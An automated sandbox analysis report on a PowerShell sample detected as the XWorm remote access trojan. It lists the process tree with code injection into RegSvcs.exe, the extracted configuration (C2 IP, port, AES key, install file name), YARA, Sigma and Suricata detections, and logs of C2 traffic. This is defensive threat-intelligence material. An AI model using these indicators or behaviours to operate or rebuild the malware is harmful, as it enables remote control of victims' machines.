Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
176.113.115_1.170.ps1

Overview

General Information

Sample name:176.113.115_1.170.ps1
Analysis ID:1583224
MD5:f344736e53d49acd78e0f3581a3a213c
SHA1:b11cb5e95986ff251bede9754b78180b4a975ec7
SHA256:3688c90e2c14026dc323b4ae1b79d4c1aead3834d883d5bcd6815971e762b88b
Tags:176-113-115-170bookingps1SPAM-ITAuser-JAMESWT_MHT
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses ipconfig to lookup or modify the Windows network settings
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 2144 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 7096 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • ipconfig.exe (PID: 7220 cmdline: "C:\Windows\system32\ipconfig.exe" /flushdns MD5: 62F170FB07FDBB79CEB7147101406EB8)
    • RegSvcs.exe (PID: 7336 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • WerFault.exe (PID: 6000 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7336 -s 1420 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
XWormMalware with wide range of capabilities ranging from RAT to ransomware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.xworm

Malware Configuration

Threatname: Xworm

{"C2 url": ["176.113.115.170"], "Port": 4412, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    0000000A.00000002.3659100760.0000000000402000.00000040.00000400.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0xad54:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0xadf1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0xaf06:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0xaade:$cnc4: POST / HTTP/1.1
    0000000A.00000002.3662994755.00000000031F1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
        00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
        • 0x34f474:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
        • 0x34f511:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
        • 0x34f626:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
        • 0x34f1fe:$cnc4: POST / HTTP/1.1
        Click to see the 6 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        0.2.powershell.exe.24a90f10d10.3.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.powershell.exe.24a90f10d10.3.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
          • 0x7241:$str01: $VB$Local_Port
          • 0x7265:$str02: $VB$Local_Host
          • 0x5e28:$str03: get_Jpeg
          • 0x61d9:$str04: get_ServicePack
          • 0x810a:$str05: Select * from AntivirusProduct
          • 0x87ca:$str06: PCRestart
          • 0x87de:$str07: shutdown.exe /f /r /t 0
          • 0x8890:$str08: StopReport
          • 0x8866:$str09: StopDDos
          • 0x895c:$str10: sendPlugin
          • 0x89dc:$str11: OfflineKeylogger Not Enabled
          • 0x8b34:$str12: -ExecutionPolicy Bypass -File "
          • 0x8fc3:$str13: Content-length: 5235
          0.2.powershell.exe.24a90f10d10.3.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x9154:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x91f1:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x9306:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x8ede:$cnc4: POST / HTTP/1.1
          0.2.powershell.exe.24a91d29520.4.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.powershell.exe.24a91d29520.4.unpackrat_win_xworm_v3Finds XWorm (version XClient, v3) samples based on characteristic stringsSekoia.io
            • 0x7241:$str01: $VB$Local_Port
            • 0x7265:$str02: $VB$Local_Host
            • 0x5e28:$str03: get_Jpeg
            • 0x61d9:$str04: get_ServicePack
            • 0x810a:$str05: Select * from AntivirusProduct
            • 0x87ca:$str06: PCRestart
            • 0x87de:$str07: shutdown.exe /f /r /t 0
            • 0x8890:$str08: StopReport
            • 0x8866:$str09: StopDDos
            • 0x895c:$str10: sendPlugin
            • 0x89dc:$str11: OfflineKeylogger Not Enabled
            • 0x8b34:$str12: -ExecutionPolicy Bypass -File "
            • 0x8fc3:$str13: Content-length: 5235
            Click to see the 10 entries

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Change PowerShell Policies to an Insecure Level
            Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", ProcessId: 2144, ProcessName: powershell.exe
            Sigma detected: Non Interactive PowerShell Process Spawned
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\176.113.115_1.170.ps1", ProcessId: 2144, ProcessName: powershell.exe

            Suricata Signatures

            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-02T09:00:32.009335+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:00:45.033565+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:00:45.212244+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:00:58.346915+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:12.144899+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:16.458355+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:25.423889+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:38.720601+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:42.283356+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:42.440244+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:45.144874+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:47.689514+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:59.597231+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:01:59.719687+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:05.408598+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:05.530671+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:05.656172+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:05.777918+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:05.899222+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:11.127964+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:15.148726+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:17.643130+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:19.299011+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:28.080337+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:33.299246+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:33.421388+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:42.768580+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:45.159706+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:46.975079+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:50.869745+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:02:51.380265+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:04.675210+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:13.377895+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:15.176040+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:18.613472+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:24.005880+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:29.143839+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:29.267647+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:35.330845+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:03:45.324246+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            2025-01-02T09:04:03.077628+010028528701Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-02T09:00:32.629988+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:00:45.035633+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:00:58.421438+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:12.146485+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:25.426143+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:38.723135+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:42.284903+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:42.441654+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:47.691509+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:59.600161+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:59.721156+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:01:59.844101+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:05.410728+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:05.532098+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:05.657495+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:05.779347+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:05.900522+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:11.129551+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:17.645317+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:19.300975+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:28.085409+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:33.303708+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:33.422984+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:33.547281+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:33.552193+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:42.770698+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:47.006775+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:50.871844+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:51.386752+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:02:51.544922+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:03:04.676686+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:03:13.379924+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:03:18.615397+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:03:24.007936+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:03:29.145691+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:03:29.269217+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            2025-01-02T09:03:35.332634+010028529231Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-02T09:00:45.212244+010028588011Malware Command and Control Activity Detected176.113.115.1704412192.168.2.749714TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-01-02T09:02:05.194685+010028587991Malware Command and Control Activity Detected192.168.2.749714176.113.115.1704412TCP

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Found malware configuration
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["176.113.115.170"], "Port": 4412, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe"}
            Multi AV Scanner detection for submitted file
            Source: 176.113.115_1.170.ps1Virustotal: Detection: 18%Perma Link
            Source: 176.113.115_1.170.ps1ReversingLabs: Detection: 13%
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Sample uses string decryption to hide its real strings
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpString decryptor: 176.113.115.170
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpString decryptor: 4412
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpString decryptor: P0WER
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm
            Source: 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
            Source: Binary string: C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbW source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.pdbcorlib.pdbpdblib.pdbC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: C:\Windows\mscorlib.pdbpdblib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbi source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Xml.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Management.pdbx source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: @[o.pdbsw source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb4 source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.PDBsg] source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb89O source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: #.dll.pdb source: powershell.exe, 00000000.00000002.1341599146.0000024A919E5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1341539656.0000024A90AB0000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000000.00000002.1341599146.0000024A90D37000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: Microsoft.VisualBasic.pdbH source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Configuration.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.ni.pdbRSDS# source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Core.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Xml.pdbO source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Windows.Forms.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3683262361.0000000006B28000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp, WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdbRSDSJ< source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.pdb246122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32x source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Management.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: mscorlib.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.000000000153C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Management.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\mscorlib.pdb-SJ source: RegSvcs.exe, 0000000A.00000002.3659546124.000000000153C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Core.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: \??\C:\Windows\symbols\exe\RegSvcs.pdbX source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: symbols\dll\mscorlib.pdbLb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: HPOo0C:\Windows\mscorlib.pdb source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\exe\RegSvcs.pdb source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: ?[oC:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbD source: RegSvcs.exe, 0000000A.00000002.3682055554.0000000005A2B000.00000004.00000010.00020000.00000000.sdmp
            Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb s source: RegSvcs.exe, 0000000A.00000002.3659546124.0000000001564000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.ni.pdb source: WERACBB.tmp.dmp.18.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WERACBB.tmp.dmp.18.dr
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior

            Networking

            barindex
            Suricata IDS alerts for network traffic
            Source: Network trafficSuricata IDS: 2858800 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49714 -> 176.113.115.170:4412
            Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 176.113.115.170:4412 -> 192.168.2.7:49714
            Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.7:49714 -> 176.113.115.170:4412
            Source: Network trafficSuricata IDS: 2858801 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound : 176.113.115.170:4412 -> 192.168.2.7:49714
            Source: Network trafficSuricata IDS: 2858799 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.7:49714 -> 176.113.115.170:4412
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: 176.113.115.170
            Source: global trafficTCP traffic: 192.168.2.7:49714 -> 176.113.115.170:4412
            Source: Joe Sandbox ViewASN Name: SELECTELRU SELECTELRU
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
            Source: unknownTCP traffic detected without corresponding DNS query: 176.113.115.170
